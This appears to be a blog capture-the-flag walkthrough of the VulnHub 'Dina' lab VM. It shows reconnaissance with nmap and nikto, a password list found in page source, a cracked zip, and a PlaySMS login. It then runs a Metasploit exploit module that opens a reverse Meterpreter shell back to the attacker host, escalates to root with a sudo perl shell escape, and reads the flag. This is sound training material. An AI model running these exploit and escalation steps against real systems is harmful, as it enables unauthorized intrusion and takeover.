We first start off with an nmap scan against the remote host.
root@ubuntu:~/Downloads# nmap -sC -sV -O -T5 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-14 19:44 MST
Nmap scan report for vtcsec (192.168.56.101)
Host is up (0.00043s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
MAC Address: 08:00:27:3A:EC:D6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.58 seconds
root@ubuntu:~/Downloads#
NMAP came back with only port 80 open and the sites robots.txt file giving us some directories to browse.
User-agent: *
Disallow: /ange1
Disallow: /angel1
Disallow: /nothing
Disallow: /tmp
Disallow: /uploads
Most of the directorys are empty but the 'nothing' contains a 404 error message. If we view source of the webpage we find a hint.
view-source:http://192.168.56.101/nothing/
#my secret pass
freedom
password
helloworld!
diana
iloveroot
We have a list of passwords we can use later. Our next task was to run nikto against the host to see if it finds any thing of intrest.
root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2019-11-14 19:49:10 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server may leak inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 07:46:52 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /ange1/: Directory indexing found.
+ Entry '/ange1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /angel1/: Directory indexing found.
+ Entry '/angel1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /uploads/: Directory indexing found.
+ Entry '/uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 5 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /secure/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8761 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time: 2019-11-14 19:49:26 (GMT-7) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program#
Nikto came back with an intreseting directory 'secure' if we browse to the directory we find a zip file backup.zip
http://192.168.56.101/secure/
If we download the archive file and try to open it we see that it is password protected. If you remember we got a list of passwords, lets try those passwords against the zip file.
We found that the password for the zip archive is 'freedom' from the list we found eariler. We now extract the mp3 file and do a little foresnics.
root@ubuntu:~/Downloads# file backup-cred.mp3
backup-cred.mp3: ASCII text
root@ubuntu:~/Downloads#
root@ubuntu:~/Downloads# strings backup-cred.mp3
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
uname: touhid
password: ******
url : /SecreTSMSgatwayLogin
root@ubuntu:~/Downloads#
The mp3 file is not a mp3 file at all but a text file. We run strings on the file and get back a message giving us a username and a url to visit.
http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login
We have a login screen here where we will try the username touhid and the passwords from the list earlier.
username: touhid
#my secret pass
freedom
password
helloworld!
diana
iloveroot
http://192.168.56.101/SecreTSMSgatwayLogin/index.php?app=main&inc=core_welcome
After we found a succesful login for touhid with the password diana. We next go on to searching for exploits for the PlaySMS software.
root@ubuntu:~/src/exploitdb# ./searchsploit playsms
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Exploit Title | Path
| (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------- -------------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit) | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit) | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery | exploits/php/webapps/30177.txt
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb#
We have a few choices, but I see there is a metasploit version which is the one we will use to get code executes and then a shell. Lets fire up metasploit and try it out.
msf5 > search playsms
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/playsms_filename_exec 2017-05-21 excellent Yes PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
1 exploit/multi/http/playsms_uploadcsv_exec 2017-05-21 excellent Yes PlaySMS import.php Authenticated CSV File Upload Code Execution
msf5 > use exploit/multi/http/playsms_filename_exec
msf5 exploit(multi/http/playsms_filename_exec) > show info
Name: PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution
Module: exploit/multi/http/playsms_filename_exec
Platform: PHP
Arch: php
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2017-05-21
Provided by:
Touhid M.Shaikh
DarkS3curity
Available targets:
Id Name
-- ----
0 PlaySMS 1.4
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD admin yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base playsms directory path
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits a code injection vulnerability within an
authenticated file upload feature in PlaySMS v1.4. This issue is
caused by improper file name handling in sendfromfile.php file.
Authenticated Users can upload a file and rename the file with a
malicious payload. This module was tested against PlaySMS 1.4 on
VulnHub's Dina 1.0 machine and Windows 7.
References:
https://www.exploit-db.com/exploits/42003
https://cvedetails.com/cve/CVE-2017-9080/
https://www.youtube.com/watch?v=MuYoImvfpew
http://touhidshaikh.com/blog/?p=336
msf5 exploit(multi/http/playsms_filename_exec) > set USERNAME touhid
USERNAME => touhid
msf5 exploit(multi/http/playsms_filename_exec) > set PASSWORD diana
PASSWORD => diana
msf5 exploit(multi/http/playsms_filename_exec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/playsms_filename_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/http/playsms_filename_exec) > set TARGETURI /SecreTSMSgatwayLogin
TARGETURI => /SecreTSMSgatwayLogin
msf5 exploit(multi/http/playsms_filename_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] Authentication successful : [ touhid : diana ]
[*] Sending stage (38288 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:40206) at 2019-11-16 13:19:18 -0700
meterpreter > shell
Process 3741 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
We got a shell after running the metasploit exploit module. Lets now try and enumerate the system to find a way to elevate our privleges.
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/sudoedit
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/arping
/usr/bin/X
/usr/bin/chfn
/usr/sbin/pppd
/usr/sbin/uuidd
/bin/ping6
/bin/umount
/bin/mount
/bin/ping
/bin/su
/bin/fusermount
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
The find command for SUID able binaries didnt come back with anything interesting soo lets try sudo -l.
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l
sudo -l
Matching Defaults entries for www-data on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on this host:
(ALL) NOPASSWD: /usr/bin/perl
www-data@Dina:/var/www/SecreTSMSgatwayLogin$
The user www-data can run sudo with no password using the perl binary. We issue a simple perl commandline and break out in to a root shell
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo perl -e 'exec("/bin/sh -i");'
sudo perl -e 'exec("/bin/sh -i");'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
#
Now that we have root and there is to do is cat the flag.txt.
# cd /root
cd /root
# ls -la
ls -la
total 52
drwx------ 6 root root 4096 Oct 17 2017 .
drwxr-xr-x 23 root root 4096 Oct 17 2017 ..
-rw------- 1 root root 2466 Oct 17 2017 .bash_history
-rw-r--r-- 1 root root 3106 Apr 19 2012 .bashrc
drwxr-xr-x 3 root root 4096 Oct 17 2017 .cache
drwxr-xr-x 3 root root 4096 Oct 17 2017 .config
drwxr-xr-x 3 root root 4096 Oct 17 2017 .local
-rw------- 1 root root 55 Oct 17 2017 .mysql_history
-rw------- 1 root root 9 Oct 17 2017 .nano_history
-rw-r--r-- 1 root root 140 Apr 19 2012 .profile
drwx------ 2 root root 4096 Nov 15 08:13 .pulse
-rw------- 1 root root 256 Oct 17 2017 .pulse-cookie
-rw-r--r-- 1 root root 639 Oct 17 2017 flag.txt
# cat flag.txt
cat flag.txt
________ _________
\________\--------___ ___ ____----------/_________/
\_______\----\\\\\\ //_ _ \\ //////-------/________/
\______\----\\|| (( ~|~ ))) ||//------/________/
\_____\---\\ ((\ = / ))) //----/_____/
\____\--\_))) \ _)))---/____/
\__/ ((( (((_/
| -))) - ))
root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....
CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6
#
No comments:
Post a Comment